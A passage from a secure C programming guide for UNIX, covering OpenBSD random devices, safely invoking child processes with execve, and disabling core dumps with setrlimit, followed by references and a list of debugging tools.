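        len -= (size_t)n;
    }

    close(fd);
    return 0;
}
```

The return value must be checked. A caller that ignores a failure would go on to use whatever happened to be in the buffer as its "random" data.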

2.7.2 OpenBSD

The OpenBSD kernel uses the mouse interrupt timing, network data interrupt latency,
inter-keypress timing and disk IO information to fill an entropy pool. Random numbers
are available for kernel routines and are exported via devices to userland programs.
OpenBSD exposes the device /dev/random to userland programs requiring random
numbers.

The following is taken from the OpenBSD manual page:

The various random devices produce random output data with different random
qualities. Entropy data is collected from system activity (like disk and network device
interrupts and such), and then run through various hash or message digest functions to
generate the output.

/dev/random This device is reserved for future support of hardware random generators.

/dev/srandom Strong random data. This device returns reliable random data. If
sufficient entropy is not currently available (i.e., the entropy pool quality
starts to run low), the driver pauses while more of such data is collected.
The entropy pool data is converted into output data using MD5.

/dev/urandom Same as above, but does not guarantee the data to be strong. The entropy
pool data is converted into output data using MD5. When the entropy
pool quality runs low, the driver will continue to output data.

/dev/prandom Simple pseudo-random generator.

/dev/arandom As required, entropy pool data re-seeds an ARC4 generator, which then
generates high-quality pseudo-random output data. The arc4random(3)
function in userland libraries seeds itself from this device, providing a
second level of ARC4 hashed data.

2.8 Invoking Child Processes

It is common for one program to require the execution of another. When this is required
in a privileged program, such as one that is setuid, or in a network service, it is important
to do this very carefully.

• Never use the following library calls from within a privileged program:

system()
popen()

Both of these functions execute the specified program by utilizing the UNIX
system’s shell interpreter, /bin/sh. By using this, a wide range of potential security
problems are unnecessarily introduced. Instead, use the execl or execv system
calls.

• Ensure that all file descriptors are closed, to prevent the child process from
inheriting access to important files.
• Ensure that the full path to the program is specified, to prevent an alternate or
Trojan version of the program from being executed.
• Drop privileges before execution, so that the child process does not inherit the
privileges of the parent.
• Ensure environment variables which are passed on to the child are cleansed. Pass a
minimal environment, only what’s needed. Environment variables can be defined
multiple times, having security consequences. Just throw it all out and
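
The points in this list can be combined as in the sketch below. The function name spawn_unprivileged(), the PATH value, and the cap of 4096 on the descriptor scan are assumptions made to keep the example short. It avoids the shell entirely, insists on a full path, closes inherited descriptors, drops privileges, and passes a minimal environment.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper: run `path` as a child without using /bin/sh.
 * Returns the child's exit status, or -1 on error.
 */
int spawn_unprivileged(const char *path, char *const argv[])
{
    char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
    pid_t pid;
    long maxfd;
    int status;
    int fd;

    /* insist on a full path so PATH cannot select a Trojan binary */
    if (path == NULL || path[0] != '/')
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* close everything except stdin, stdout and stderr;
         * the 4096 cap is a simplifying assumption for this sketch */
        maxfd = sysconf(_SC_OPEN_MAX);
        if (maxfd < 0 || maxfd > 4096)
            maxfd = 4096;
        for (fd = 3; fd < (int)maxfd; fd++)
            close(fd);

        /* permanently drop privileges, group ID first */
        if (setgid(getgid()) < 0 || setuid(getuid()) < 0)
            _exit(126);

        execve(path, argv, envp);
        _exit(127);             /* only reached if execve() failed */
    }

    if (waitpid(pid, &status, 0) < 0)
        return -1;

    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Because the arguments are passed as a vector directly to execve(), shell metacharacters in them are never interpreted, which removes the main danger of system() and popen().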

2.9 Resource Limitations

2.9.1 Core files

Core files are generated by UNIX programs when an exception occurs. These exceptions
normally occur when the program memory or stack is corrupted, or invalid memory or
misaligned structures are accessed. This situation occurs due to program flaws,
introduced by the developer. When the exception occurs, the operating system writes the
memory of the currently executing program to a disk file, usually called ‘core’ or
‘program.core’, where program is the name of the program which was executing. The
normal use of the core is to analyze the state of the program when it crashed, and assist in
determining where the problem occurred. Two security problems arise out of the creation
of this core file.

• Since all memory contents of the program are written to this file, it is possible that
important, or security critical information (passwords) were in the program’s
memory at the time, and were written to this file.
• Some operating systems have, in the past, failed to check for the previous
existence of the core file, which they are about to create. This can lead to an
interesting security problem if an attacker has created a link, pointing it to a
system critical file. Now by executing a setuid/setgid program which has
permission to write to the target file, and causing the program to have an
exception, the attacker can cause the destruction of the target file, effectively
causing a denial of service attack. The operating system will write a core file out,
with the privilege of the running process, and will follow the attacker’s link to
overwrite a system critical file.

A good example of where the first problem occurred in the past was in the FTP server
which shipped with the Solaris operating system. A flaw existed whereby an attacker
could connect to the FTP server, and issue the PASV command before any other
command, causing the FTP server to crash. Upon crashing, the FTP server would dump
its memory contents into a core file, located in the system root directory. By analyzing
this file, a user with local system access could extract password file hashes, which could
then be cracked to obtain usernames and passwords.

If your program will contain security critical information in memory, it is wise to disable
the creation of core files upon an exception. You can use the setrlimit() function call to
accomplish this.

int setrlimit(int resource, const struct rlimit *rlp);

By using this function, with a resource type of RLIMIT_CORE, you can set the size of
the core file that is created (in bytes). If you specify a size of 0, this prevents a core file
from being created.

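#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>

int nocore()
{
    struct rlimit rlp;

    /* a limit of 0 bytes prevents a core file from being written */
    rlp.rlim_cur = 0;
    rlp.rlim_max = 0;

    return(setrlimit(RLIMIT_CORE, &rlp));
}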

[1] Smashing The Stack For Fun And Profit
http://www.securityfocus.com/data/library/P49-14.txt
[3] Secure Programming v1.00
http://www.securityfocus.com/frames/?content=/forums/secprog/secure-programming.html
[4] Format String Attacks
By: Tim Newsham Guardent
http://www.guardent.com/docs/FormatString.PDF
[5] w00w00 on Heap Overflows
By: Matt Conover (a.k.a. Shok) & w00w00 Security Team
http://www.w00w00.org/files/articles/heaptut.txt

Tools
Checker is a tool which finds memory errors at runtime. Its primary function is to emit a
warning when the program reads an uninitialized variable or memory area, or when the
program accesses an unallocated memory area.
Homepage: http://www.gnu.org/software/checker/checker.html
The GNU Debugger (GDB) is a source-level debugger for C, C++, Java, Modula-2, and
several other languages. It runs on GNU/Linux, the BSD’s, and almost every major
proprietary OS. GDB can debug programs running on the same machine as itself, or it
can communicate over a network or serial line with a debugging stub on another
machine; thus, it can be used for embedded and kernel debugging.
Homepage: http://sources.redhat.com/gdb/
Electric Fence is a malloc() debugger for Linux and Unix. This will stop your program on
the exact instruction that overruns or under-runs a malloc() buffer.
Homepage: http://perens.com/FreeSoftware/
LCLint is a tool for statically checking C programs. With minimal effort, LCLint can be
used as a better lint. If additional effort is invested adding annotations to programs,
LCLint can perform stronger checks than can be done by any standard lint.
Homepage: http://lclint.cs.virginia.edu/
Strace is a system call tracer, i.e. a debugging tool which prints out a trace of all the
system calls made by another process/program. The program to be traced need not be
recompiled for this, so you can use it on binaries for which you don’t have source.
Homepage: http://www.wi.leidenuniv.nl/~wichert/strace/
